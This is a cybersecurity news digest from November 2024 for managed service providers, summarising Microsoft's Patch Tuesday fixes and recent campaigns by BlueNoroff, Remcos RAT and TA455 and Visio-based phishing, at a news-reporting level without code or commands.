MSP cybersecurity news digest, November 19, 2024

Microsoft Patch Tuesday for November 2024 fixes 89 flaws, including four zero days 

Microsoft’s November 2024 Patch Tuesday addressed 89 vulnerabilities, including four zero-day flaws, two of which were actively exploited. The update resolved four critical issues: two remote code execution and two privilege elevation flaws.

Notable zero days included CVE-2024-43451, which exposes NTLM hashes, and CVE-2024-49039, a Windows Task Scheduler flaw that allows privilege elevation. Three other vulnerabilities, including a Microsoft Exchange Server spoofing flaw (CVE-2024-49040) and an Active Directory Certificate Services issue (CVE-2024-49019) were disclosed, but not actively exploited.

The updates also incorporated fixes for previously patched Microsoft Edge vulnerabilities.

Cryptocurrency thieves attack macOS: “Hidden Risk” malware disguises itself as PDFs

North Korean attackers, identified by researchers, are targeting the cryptocurrency industry using advanced multistage malware.

The latest phishing campaign, active since October 2024, builds on prior attacks and bypasses macOS defenses by using signed and notarized code. Dubbed “Hidden Risk,” this campaign involves attackers using phishing emails with deceptive cryptocurrency-themed PDF lures to trick victims into downloading malicious apps. The malware maintains control of macOS systems by exploiting the Zshenv configuration file, a hidden script that runs whenever the command-line shell starts, enabling automatic execution of malicious code and evasion of detection.

The group behind these attacks, BlueNoroff, linked to the infamous Lazarus, uses a vast network mimicking legitimate cryptocurrency companies for malware delivery and control.

Fileless version of Remcos RAT malware spread through exploited Excel attachments

Researchers have uncovered a new phishing campaign spreading a fileless variant of the Remcos RAT malware.

This malware is known for its robust features that allow attackers to control victims’ computers and collect sensitive data. The campaign begins with purchase-order themed phishing emails containing malicious Excel attachments exploiting a known remote code execution vulnerability (CVE-2017-0199). The attachment downloads an HTML application (HTA) file that runs a complex mix of JavaScript, VBScript and PowerShell, ultimately deploying Remcos RAT directly in memory using process hollowing. Remcos enables attackers to harvest data, control processes and execute remote commands.

Separately, researchers highlighted that attackers have exploited DocuSign APIs to send realistic-looking, fake invoices, bypassing security defenses with legitimate accounts.

Aerospace industry attacked by Iranian hackers using “Dream Job” lures to deploy SnailResin malware

The Iranian threat actor TA455 has adopted tactics similar to North Korea’s “Dream Job” campaign, using fake job offers to target the aerospace industry since September 2023.

This group, linked to APT35 and Iran’s Islamic Revolutionary Guard Corps (IRGC), distributes malware such as SnailResin to deploy the SlugResin backdoor. Their methods include job-themed lures, DLL side-loading, and the use of fake recruiting websites and LinkedIn profiles. Researchers highlighted the use of a trojan loader (secur32.dll) that grants remote access to compromised systems, allowing attackers to steal data and move laterally.

TA455’s campaigns utilize GitHub to obscure command-and-control activities, blending with legitimate traffic. The operation involves multistage infections and spear-phishing emails with job-related documents to bypass detection and deceive targets.

Researchers: Two-step phishing attacks using Microsoft Visio files are a major threat

Researchers have noted that two-step phishing attacks have become a significant threat, using trusted platforms like DocuSign and SharePoint to deliver malicious content in layers.

Recently, Microsoft Visio files have been weaponized in these campaigns as a new tactic to evade detection. Visio files, typically used for creating professional diagrams, are being exploited to hide malicious URLs, tricking users into clicking links. Attackers send compromised emails with Visio files hosted on SharePoint, often using breached accounts to enhance legitimacy. The files contain deceptive elements, such as “View Document” buttons that, when clicked with the “Ctrl” key held, lead victims to phishing sites.

This approach targets organizations worldwide and seeks to steal user credentials through a fake Microsoft login page.